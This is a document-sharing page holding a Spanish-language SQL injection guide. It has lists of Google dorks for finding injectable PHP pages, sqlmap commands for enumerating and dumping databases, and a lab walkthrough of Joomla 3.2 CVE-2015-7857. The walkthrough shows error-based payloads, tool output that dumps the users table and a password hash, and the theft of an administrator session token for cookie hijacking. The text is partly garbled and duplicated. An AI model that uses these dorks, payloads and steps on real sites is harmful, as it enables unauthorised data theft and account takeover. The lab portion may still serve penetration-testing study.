Sqlmap - New

dork para inyecciones sql
GOOGLE DORK STRING

COLUMN 1
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:index.php?catid=
inurl:news.php?catid=
inurl:index.php?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurl:Stray-Questions-View.php?
num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
GOOGLE DORK STRING

COLUMN 2
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurl:opinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurl:offer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:ogl_inet.php?ogl_id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurl:preview.php?id=
GOOGLE DORK STRING

COLUMN 3
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurl:profile_view.php?id=
inurl:category.php?id=
inurl:publications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurl:prod_info.php?id=
inurl:shop.php?do=part&id=
inurl:productinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurl:product.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurl:produit.php?id=
inurl:pop.php?id=
inurl:shopping.php?id=
inurl:productdetail.php?id=
inurl:post.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurl:page.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurl:product_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:loadpsb.php?id=
inurl:transcript.php?id=
inurl:opinions.php?id=
inurl:spr.php?id=
inurl:pages.php?id=
inurl:clanek.php4?id=
inurl:participant.php?id=
inurl:channel_id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:pages.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:prod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurl:person.php?id=
inurl:productinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
EJEMPLO
.php?id=101
sqlmap
python sqlmap.py -u "target_url"
--columns
-C column_name dump
--dbs
-D database_name --tables
-D database_name -T table_name
-D database_name -T table_name
Web application Penetration Testing SQL Injection with SQLMAP
Penetration Testing Using SQL MAP

for the help options . This will basically provide you with a List of all the Commands available with SQL Map.
sqlmap -h
To start with we will begin with a Basic command : sqlmap -u <URL to inject>
sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1
Sometimes, using the time-sec helps to speed up the process, especially when the server responses are slow.
sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1
--time-sec 15
numeration of Database
sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 --dbs
Table
sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D
acuart --tables
The result should be something like this
Database: acuart
[8 tables]
++
| artists |
| carts |
| categ |
| featured |
| guestbook |
| pictures |
| products |
| users |
Columns
acuart -T users
--columns
Data
acuart -T
users -C email,name,pass dump
Joomla es uno de los sistemas de gestin de contenidos ms populares para la creacin

de pginas web. En estos momentos se estima que 2.8 millones de sitios web estn
construidos con este CMS. Normalmente las vulnerabilidades que se encuentran en
estos sistemas afectan a extensiones de terceros, lo cual limita la superficie de ataque
nicamente a aquellos sitios que hagan uso de ellas. Pero en algunas ocasiones, las
vulnerabilidades tambin se encuentran en el ncleo del CMS, como en este caso, en el
que ha quedado expuesto a un posible ataque que permite un acceso con permisos de
administrador al 6,6% de todos los sitios web que utilizan sistemas de gestin de
contenidos, la cuota de mercado actual de Joomla.
La vulnerabilidad publicada hace dos das y para la que ya ha salido parche se trata de
una inyeccin de SQL identificada con los CVE CVE-2015-7297, CVE-2015-7857, y CVE2015-7858 afectando desde la version 3.2 hasta la ltima versin actual 3.4.4. Esta se
encuentra en una consulta SQL en el archivo
/administrator/components/com_contenthistory/models/history.php. En el blog de
trustwave hacen una muy buena descripcin tcnica de cmo han ido atando cabos
hasta dar con la vulnerabilidad.
Por mi parte he montado un pequeo laboratorio con un Joomla vulnerable, en este caso
la versin 3.2, para comprobar cmo se puede explotar.
He probado la inyeccin directamente con sqlmap:
sqlmap -u "http://127.0.0.1/Joomla/index.php?
option=com_contenthistory&view=history&list[ordering]
=&item_id=1&list[select]=" --threads=10 --dbms=MYSQL
--technique=E --dbs
Obteniendo la inyeccin:
option=com_contenthistory&view=history&item_id=1&list[select]
=" --threads=10 --dbms=MYSQL --technique=E --dbs

_
___ ___| |_____ ___ ___ {1.0-dev-nongit-20151024}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent
is illegal. It is the end user's responsibility to obey all applicable local, state and federal
laws. Developers assume no liability and are not responsible for any misuse or damage
caused by this program
[*] starting at 19:47:40
[19:47:40] [INFO] loading tamper script 'apostrophemask'
[19:47:40] [WARNING] provided value for parameter 'list[select]' is empty. Please,
always use only valid parameter values so sqlmap could be able to run properly
[19:47:40] [INFO] testing connection to the target URL

[19:47:40] [WARNING] there is a DBMS error found in the HTTP response body which
could interfere with the results of the tests
sqlmap resumed the following injection point(s) from stored session:
--Parameter: list[select] (GET)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY
clause
Payload:
option=com_contenthistory&view=history&list[ordering]=&item_id=1&a
mp;list[select]=' AND (SELECT 5490 FROM(SELECT COUNT(*),CONCAT(0x716b6b6b71,
(SELECT (ELT(5490=5490,1))),0x7170717171,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
--[19:47:40] [WARNING] changes made by tampering scripts are not included in shown
payload content(s)
[19:47:40] [INFO] testing MySQL
[19:47:40] [INFO] confirming MySQL
[19:47:40] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian
web application technology: Apache 2.4.10
back-end DBMS: MySQL >= 5.0.0
[19:47:40] [INFO] fetching database names
[19:47:40] [INFO] the SQL query used returns 4 entries
[19:47:40] [INFO] starting 4 threads
[19:47:40] [INFO] resumed: JoomlaLab
[19:47:40] [INFO] resumed: mysql
[19:47:40] [INFO] resumed: performance_schema
[19:47:40] [INFO] resumed: information_schema
available databases [4]:
[*] information_schema
[*] JoomlaLab
[*] mysql
[*] performance_schema
[19:47:40] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 3 times
[19:47:40] [INFO] fetched data logged to text files under '/root/.sqlmap/output/127.0.0.1'
[*] shutting down at 19:47:40
A continuacin podemos enumerar las tablas de la base de datos:
=" --threads=10 --dbms=MYSQL --tamper=apostrophemask

--technique=E -D JoomlaLab --tables
_
___ ___| |_____ ___ ___ {1.0-dev-nongit-20151024}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
[19:52:28] [INFO] loading tamper script 'apostrophemask'
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY
clause
Payload:
mp;list[select]=' AND (SELECT 5490 FROM(SELECT COUNT(*),CONCAT(0x716b6b6b71,
(SELECT (ELT(5490=5490,1))),0x7170717171,FLOOR(RAND(0)*2))x FROM
--[19:52:28] [WARNING] changes made by tampering scripts are not included in shown
payload content(s)
[19:52:28] [INFO] testing MySQL
[19:52:28] [INFO] fetching tables for database: 'JoomlaLab'
[19:52:28] [WARNING] reflective value(s) found and filtering out
[19:52:29] [INFO] retrieved: q9741_banner_tracks
[19:52:29] [INFO] retrieved: q9741_assets
[19:52:29] [INFO] retrieved: q9741_categories
[19:52:29] [INFO] retrieved: q9741_banner_clients
[19:52:29] [INFO] retrieved: q9741_associations
[19:52:29] [INFO] retrieved: q9741_banners
[19:52:29] [INFO] retrieved: q9741_contact_details
[19:52:29] [INFO] retrieved: q9741_content_frontpage
[19:52:29] [INFO] retrieved: q9741_content
[19:52:29] [INFO] retrieved: q9741_content_rating
[19:52:29] [INFO] retrieved: q9741_content_types

[19:52:29] [INFO] retrieved: q9741_core_log_searches
[19:52:29] [INFO] retrieved: q9741_contentitem_tag_map
[19:52:29] [INFO] retrieved: q9741_finder_links
[19:52:29] [INFO] retrieved: q9741_extensions
[19:52:29] [INFO] retrieved: q9741_finder_links_terms1
[19:52:29] [INFO] retrieved: q9741_finder_filters
[19:52:29] [INFO] retrieved: q9741_finder_links_termsb
[19:52:29] [INFO] retrieved: q9741_finder_links_termsa
[19:52:29] [INFO] retrieved: q9741_finder_links_termsc
[19:52:30] [INFO] retrieved: q9741_finder_links_termse
[19:52:30] [INFO] retrieved: q9741_finder_links_termsd
[19:52:30] [INFO] retrieved: q9741_finder_terms
[19:52:30] [INFO] retrieved: q9741_finder_taxonomy
[19:52:30] [INFO] retrieved: q9741_finder_tokens
[19:52:30] [INFO] retrieved: q9741_finder_tokens_aggregate
[19:52:30] [INFO] retrieved: q9741_finder_taxonomy_map
[19:52:30] [INFO] retrieved: q9741_finder_links_termsf
[19:52:30] [INFO] retrieved: q9741_finder_terms_common
[19:52:30] [INFO] retrieved: q9741_modules_menu

[19:52:30] [INFO] retrieved: q9741_menu
[19:52:30] [INFO] retrieved: q9741_menu_types
[19:52:30] [INFO] retrieved: q9741_messages_cfg
[19:52:30] [INFO] retrieved: q9741_messages
[19:52:30] [INFO] retrieved: q9741_languages
[19:52:30] [INFO] retrieved: q9741_finder_types
[19:52:30] [INFO] retrieved: q9741_modules
[19:52:30] [INFO] retrieved: q9741_newsfeeds
[19:52:30] [INFO] retrieved: q9741_tags
[19:52:30] [INFO] retrieved: q9741_postinstall_messages
[19:52:30] [INFO] retrieved: q9741_overrider
[19:52:30] [INFO] retrieved: q9741_session
[19:52:30] [INFO] retrieved: q9741_redirect_links
[19:52:30] [INFO] retrieved: q9741_template_styles
[19:52:30] [INFO] retrieved: q9741_schemas
[19:52:30] [INFO] retrieved: q9741_ucm_base
[19:52:30] [INFO] retrieved: q9741_updates
[19:52:30] [INFO] retrieved: q9741_ucm_content
[19:52:30] [INFO] retrieved: q9741_update_sites_extensions
[19:52:30] [INFO] retrieved: q9741_user_notes
[19:52:30] [INFO] retrieved: q9741_update_sites
[19:52:30] [INFO] retrieved: q9741_ucm_history
[19:52:30] [INFO] retrieved: q9741_user_usergroup_map
[19:52:30] [INFO] retrieved: q9741_user_keys
[19:52:30] [INFO] retrieved: q9741_viewlevels
[19:52:30] [INFO] retrieved: q9741_usergroups
[19:52:30] [INFO] retrieved: q9741_user_profiles
[19:52:30] [INFO] retrieved: q9741_users

[19:52:30] [INFO] retrieved: q9741_weblinks
Database: JoomlaLab
[68 tables]
+-------------------------------+
| q9741_assets |
| q9741_associations |
| q9741_banner_clients |
| q9741_banner_tracks |
| q9741_banners |
| q9741_categories |
| q9741_contact_details |
| q9741_content |
| q9741_content_frontpage |
| q9741_content_rating |
| q9741_content_types |
| q9741_contentitem_tag_map |
| q9741_core_log_searches |
| q9741_extensions |
| q9741_finder_filters |
| q9741_finder_links |
| q9741_finder_links_terms0 |
| q9741_finder_links_termsa |
| q9741_finder_links_termsb |
| q9741_finder_links_termsc |
| q9741_finder_links_termsd |
| q9741_finder_links_termse |
| q9741_finder_links_termsf |
| q9741_finder_taxonomy |
| q9741_finder_taxonomy_map |
| q9741_finder_terms |
| q9741_finder_terms_common |
| q9741_finder_tokens |
| q9741_finder_tokens_aggregate |
| q9741_finder_types |
| q9741_languages |
| q9741_menu |
| q9741_menu_types |
| q9741_messages |
| q9741_messages_cfg |
| q9741_modules |
| q9741_modules_menu |
| q9741_newsfeeds |
| q9741_overrider |
| q9741_postinstall_messages |
| q9741_redirect_links |
| q9741_schemas |
| q9741_session |
| q9741_tags |
| q9741_template_styles |
| q9741_ucm_base |
| q9741_ucm_content |
| q9741_ucm_history |
| q9741_update_sites |
| q9741_update_sites_extensions |
| q9741_updates |
| q9741_user_keys |
| q9741_user_notes |
| q9741_user_profiles |
| q9741_user_usergroup_map |
| q9741_usergroups |
| q9741_users |
| q9741_viewlevels |
| q9741_weblinks |
+-------------------------------+
root@KaliVB:~#
A continuacin se puede ir por el camino clsico y volcar la tabla de usuarios para
crackear el hash de la contrasea:
=" --threads=10 --dbms=MYSQL --technique=E -D JoomlaLab -T

q9741_users --dump
_
___ ___| |_____ ___ ___ {1.0-dev-nongit-20151024}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
Type: error-based
Title: MySQL >= 5.0 error-based - Parameter replace
Payload:
mp;list[select]=(SELECT 9327 FROM(SELECT COUNT(*),CONCAT(0x716b706b71,(SELECT
(ELT(9327=9327,1))),0x7170767a71,FLOOR(RAND(0)*2))x FROM
--[21:00:11] [INFO] testing MySQL
[21:00:11] [INFO] fetching columns for table 'q9741_users' in database 'JoomlaLab'
[21:00:11] [WARNING] reflective value(s) found and filtering out

[21:00:11] [INFO] retrieved: id
[21:00:11] [INFO] retrieved: name
[21:00:11] [INFO] retrieved: registerDate
[21:00:11] [INFO] retrieved: password
[21:00:11] [INFO] retrieved: email
[21:00:11] [INFO] retrieved: block
[21:00:11] [INFO] retrieved: sendEmail
[21:00:11] [INFO] retrieved: username
[21:00:11] [INFO] retrieved: activation
[21:00:11] [INFO] retrieved: lastvisitDate
[21:00:11] [INFO] retrieved: varchar(100)
[21:00:11] [INFO] retrieved: tinyint(4)
[21:00:11] [INFO] retrieved: datetime
[21:00:11] [INFO] retrieved: tinyint(4)
[21:00:11] [INFO] retrieved: int(11)
[21:00:11] [INFO] retrieved: params
[21:00:11] [INFO] retrieved: resetCount
[21:00:11] [INFO] retrieved: otep
[21:00:11] [INFO] retrieved: lastResetTime
[21:00:11] [INFO] retrieved: otpKey
[21:00:11] [INFO] retrieved: text

[21:00:12] [INFO] retrieved: int(11)
[21:00:12] [INFO] fetching entries for table 'q9741_users' in database 'JoomlaLab'
[21:00:12] [INFO] retrieved: 0
[21:00:12] [INFO] retrieved: correo@gmail.com
[21:00:12] [INFO] retrieved: 0000-00-00 00:00:00
[21:00:12] [INFO] retrieved: 2015-10-24 16:16:32
[21:00:12] [INFO] retrieved: Super User
[21:00:12] [INFO] retrieved:
$2y$10$SD20rJFbG7QEXyfMaw9IC.yRigW2NwZ2RVZzbFlNJ1/cDTsC9DL2y
[21:00:12] [INFO] retrieved: 2015-10-24 16:11:53
[21:00:12] [INFO] retrieved: alberto
[21:00:12] [INFO] analyzing table dump for possible password hashes
Database: JoomlaLab
Table: q9741_users
[1 entry]
+-----+------------+---------+---------------------------------+-------+---------+---------+---------+--------------------------------------------------------------+-----------+------------+------------
+---------------------+---------------------+---------------------+
| id | name | otep | email | block | otpKey | params | username | password | sendEmail |
activation | resetCount | registerDate | lastResetTime | lastvisitDate |
+-----+------------+---------+---------------------------------+-------+---------+---------+---------+--------------------------------------------------------------+-----------+------------+-----------+---------------------+---------------------+---------------------+
| 601 | Super User | <blank> | correo@gmail.com | 0 | <blank> | <blank> |
alberto | $2y$10$SD20rJFbG7QEXyfMaw9IC.yRigW2NwZ2RVZzbFlNJ1/cDTsC9DL2y | 1 | 0
| 0 | 2015-10-24 16:11:53 | 0000-00-00 00:00:00 | 2015-10-24 16:16:32 |
+-----+------------+---------+---------------------------------+-------+---------+---------+---------+--------------------------------------------------------------+-----------+------------+-----------+---------------------+---------------------+---------------------+
[21:00:12] [INFO] table 'JoomlaLab.q9741_users' dumped to CSV file
'/root/.sqlmap/output/127.0.0.1/dump/JoomlaLab/q9741_users.csv'
Pero dandole una vuelta ms, lo que hacen en Trustwave para saltarse el farragoso
proceso de crackear la contrasea es consultar la tabla *_session y coger el token de
autenticacin del administrador para hacer un secuestro de sesin o hijacking.
root@KaliVB:~# sqlmap -u "http://127.0.0.1/Joomla/index.php?option=com_contenthistory&a

laws. Developers assume no liability and are not responsible for any misuse or damage cause
point(s) from stored session: --- Parameter: list[select] (GET) Type: error-based Title: MySQL &g
[21:20:15] [INFO] the back-end DBMS is MySQL web server operating system: Linux Debian w
[INFO] resumed: guest [21:20:15] [INFO] resumed: tinyint(4) unsigned [21:20:15] [INFO] resum
[21:20:15] [INFO] resumed: __default|a:7:{s:15:"session.counter";i:1;s:19:"session.timer.start"
{s:9:"\\\\0\\\\0\\\\0isRoot";N;s:2:"id";i:0;s:4:"name";N;s:8:"username";N;s:5:"email";N;s:8:"pass
{i:0;i:1;i:1;i:1;}s:15:"\\\\0\\\\0\\\\0_authActions";N;s:12:"\\\\0\\\\0\\\\0_errorMsg";N;s:10:"\\\\0\\\\0
+-------------------------------------------------------------------------------------------------------------------------------1----------------------------------------------------------------------------------------------------------------------------------2+-------------------------------------------------------------------------------------------------------------------------------3----------------------------------------------------------------------------------------------------------------------------------{s:15:"session.counter";i:1;s:19:"session.timer.start";i:1445712986;s:18:"session.timer.last";i:
{s:9:"\\0\\0\\0isRoot";N;s:2:"id";i:0;s:4:"name";N;s:8:"username";N;s:5:"email";N;s:8:"password
{i:0;i:1;i:1;i:1;}s:15:"\\0\\0\\0_authActions";N;s:12:"\\0\\0\\0_errorMsg";N;s:10:"\\0\\0\\0_errors"
+-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------[21:20:15] [INFO] fetched data logged to text files under '/root/.sqlmap/output/127.0.0.1' [*] s
root@KaliVB:~#
Una vez se obtiene el token slo hay que refrescar el navegador.
Refrescar el navegador
Modificar la cookie con el valor de session_id
Manipular la cookie con el session id

Y ya estamos dentro.
Secuestro de sesin
Queda visto lo sencillo que es explotar esta vulnerabilidad. La recomendacin es
actualizar cunto antes a la ltima versin que solventa esta vulnerabilidad y esperara a
Noviembre cuando se lanzar la versin 3.5 renovada.

Sqlmap - New

Transféré par

Informations du document

Copyright

Formats disponibles

Partager ce document

Partager ou intégrer le document

Options de partage

Avez-vous trouvé ce document utile ?

Ce contenu est-il inapproprié ?

Droits d'auteur :

Formats disponibles

Sqlmap - New

Transféré par

Droits d'auteur :

Formats disponibles

dork para inyecciones sql

GOOGLE DORK STRING

GOOGLE DORK STRING

GOOGLE DORK STRING

Web application Penetration Testing SQL Injection with SQLMAP

Penetration Testing Using SQL MAP

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 --dbs

Joomla es uno de los sistemas de gestin de contenidos ms populares para la creacin

=" --threads=10 --dbms=MYSQL --technique=E --dbs

[19:47:40] [INFO] testing connection to the target URL

=" --threads=10 --dbms=MYSQL --tamper=apostrophemask

[19:52:29] [INFO] retrieved: q9741_content_types

[19:52:30] [INFO] retrieved: q9741_modules_menu

[19:52:30] [INFO] retrieved: q9741_users

=" --threads=10 --dbms=MYSQL --technique=E -D JoomlaLab -T

[21:00:11] [WARNING] reflective value(s) found and filtering out

[21:00:11] [INFO] retrieved: text

root@KaliVB:~# sqlmap -u "http://127.0.0.1/Joomla/index.php?option=com_contenthistory&a

Manipular la cookie con el session id

Vous aimerez peut-être aussi